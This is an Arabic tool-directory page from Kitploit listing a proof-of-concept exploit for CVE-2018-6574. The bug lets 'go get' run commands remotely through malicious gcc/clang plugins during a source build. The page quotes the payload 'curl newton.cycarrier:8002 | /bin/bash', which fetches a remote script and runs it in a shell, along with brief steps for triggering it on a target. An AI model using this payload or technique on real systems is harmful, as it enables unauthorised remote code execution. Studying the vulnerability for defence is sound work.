Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-6574 — استغلال إثبات المفهوم لـ CVE-2018-6574، يوضح تنفيذ الأوامر عن بُعد في أمر go get الخاص بـ Go عبر إضافات المترجم الخبيثة أثناء بناء الشفرة المصدرية. | Kitploit
أدوات/GitHubGitHub/frozenkp/cve-2018-6574
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubfrozenkp/cve-2018-6574

CVE-2018-6574

استغلال إثبات المفهوم لـ CVE-2018-6574، يوضح تنفيذ الأوامر عن بُعد في أمر go get الخاص بـ Go عبر إضافات المترجم الخبيثة أثناء بناء الشفرة المصدرية.

عرض المستودع
21منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-6574

Go قبل الإصدار 1.8.7، وGo 1.9.x قبل الإصدار 1.9.4، والإصدارات الأولية لـGo 1.10 قبل Go 1.10rc2 تسمح بتنفيذ أوامر عن بُعد عبر go get أثناء بناء الشيفرة المصدرية، وذلك من خلال استغلال ميزة الإضافات (plugins) في gcc أو clang، لأن الوسيطات -fplugin= و -plugin= لم تكن محظورة. (من mitre)

أمر RCE

تم تجميع الأمر في المكتبة الديناميكية calc_darwin.so. والأمر الحالي هو curl newton.cycarrier:8002 | /bin/bash. تم استخدامه كوصول أولي لبرنامج. يجب عليك استضافة خادم ملفات على المنفذ 8002 وربط المضيف بعنوان IP الخاص بك.

كيفية التشغيل؟

أولاً، يجب تثبيت الإصدار المطلوب من Go على الجهاز المستهدف. ثم، استضافة هذا المستودع على خادم Git يمكن الوصول إليه. أخيرًا، استخدم الأمر go get لجلب هذا المستودع، وسيتم تنفيذ الأمر تلقائيًا.

خذ مستودعي كمثال. عليك استخدام الأمر التالي:

root@kitploit:~
go get github.com/frozenkp/CVE-2018-6574

تحذير

هذا المستودع مخصص لأغراض التقييم فقط.

تنزيل الأداة